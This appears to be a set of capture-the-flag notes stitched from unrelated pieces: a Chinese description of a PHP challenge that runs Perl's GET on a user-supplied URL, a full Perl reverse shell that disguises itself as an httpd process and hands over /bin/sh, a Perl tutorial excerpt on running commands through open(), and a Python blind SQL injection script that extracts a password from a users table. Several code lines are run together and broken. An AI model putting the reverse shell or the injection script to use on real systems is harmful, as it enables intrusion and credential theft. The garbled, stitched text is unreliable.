1.基于REMOTE_ADDR创建沙箱文件夹; 2.将传入的URL带入命令GET执行。这里的GET命令是Lib for WWW in Perl中的命令,目的是模拟http的GET请求; 3.利用pathinfo函数解析传入的filename参数,获取路径名最后一层文件夹创建并进入该路径; 4.利用basename函数获取filename传参内容的最后以及文件夹名称; 5.利用file_put_contents函数将GET命令执行的结果写入以filename中的文件名命名的文件中。
#!/usr/bin/perl -w # perl-reverse-shell - A Reverse Shell implementation in PERL use strict; use Socket; use FileHandle; use POSIX; my $VERSION = "1.0";
# Where to send the reverse shell. Change these. my $ip = '127.0.0.1'; my $port = 12345;
# Options my $daemon = 1; my $auth = 0; # 0 means authentication is disabled and any # source IP can access the reverse shell my $authorised_client_pattern = qr(^127\.0\.0\.1$); # Declarations my $global_page = ""; my $fake_process_name = "/usr/sbin/apache"; # Change the process name to be less conspicious $0 = "[httpd]"; # Authenticate based on source IP address if required if (defined($ENV{'REMOTE_ADDR'})) { cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
if ($auth) { unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { cgiprint("ERROR: Your client isn't authorised to view this page"); cgiexit(); } } } elsif ($auth) { cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); cgiexit(0); }
# Background and dissociate from parent process if required if ($daemon) { my $pid = fork(); if ($pid) { cgiexit(0); # parent exits }
setsid(); chdir('/'); umask(0); }
# Make TCP connection for reverse shell socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { cgiprint("Sent reverse shell to $ip:$port"); cgiprintpage(); } else { cgiprint("Couldn't open reverse shell to $ip:$port: $!"); cgiexit(); }
# Redirect STDIN, STDOUT and STDERR to the TCP connection open(STDIN, ">&SOCK"); open(STDOUT,">&SOCK"); open(STDERR,">&SOCK"); $ENV{'HISTFILE'} = '/dev/null'; system("w;uname -a;id;pwd"); exec({"/bin/sh"} ($fake_process_name, "-i"));
# Wrapper around print subcgiprint{ my $line = shift; $line .= "<p>\n"; $global_page .= $line; }
# Wrapper around exit subcgiexit{ cgiprintpage(); exit0; # 0 to ensure we don't give a 500 response. }
# Form HTTP response using all the messages gathered by cgiprint so far subcgiprintpage{ print"Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page; }
Executing Programs with “open” In addition to what we saw last week, the “open” command has one more very powerful application: it allows you to execute a command, send input and receive output. Try this program (it only works on Unix):
#!/usr/bin/perl -w use strict;
open DATA, "who |"ordie"Couldn't execute program: $!"; while ( defined( my $line = <DATA> ) ) { chomp($line); print"$line\n"; } close DATA;
Here’s what happened: Perl saw that your “file” ended with a “pipe” (verticalbar) character. So it interpreted the “file” as a command to be executed, and interpreted the command’s output as the “file”‘s contents. The command is “who” (which prints information on currently logged-in users). If you execute that command, you will see that the output is exactly what the Perl program gave you.
In this case, we “read” data from the command. To execute a command that we can “write” (send data) to, we should place a pipe character BEFORE the command. These options are mutually exclusive: we can read from a command or write to it, but not both.
In the Unix world, a lot can be done by piping the output of one program into the input of another. Perl continues this spirit.
Note that we can also send command-line parameters to the command, like this:
open DATA, "who -H |"or die "Couldn't execute program: $!";
In fact, Perl allows you to use “open” to do pretty much anything you would normally do on the command-line, as this example demonstrates:
openOUTPUT, "| grep 'foo' > result.txt"or die "Failure: $!";
We can then write whatever we want to the “OUTPUT” filehandle. The Unix “grep” command will filter out any text which doesn’t contain the text “foo”; any text which DOES contain “foo” will be written to “result.txt”.
import requests import time name='' for j in range(1,21): l = 32 h = 127 while abs(l-h)>1: i=int((l+h)/2) url="http://a215b254-c237-4670-a4cc-9dfea3d34f26.node3.buuoj.cn/image.php?id=\\0'&path= or ascii(substr((select password from users),"+str(j)+",1))>"+str(i)+"%23" r = requests.get(url) time.sleep(0.005) if r.status_code=='429': print('to fast') ifnot'Content-Length'in r.headers: l = i else: h = i name += chr(h) print(name)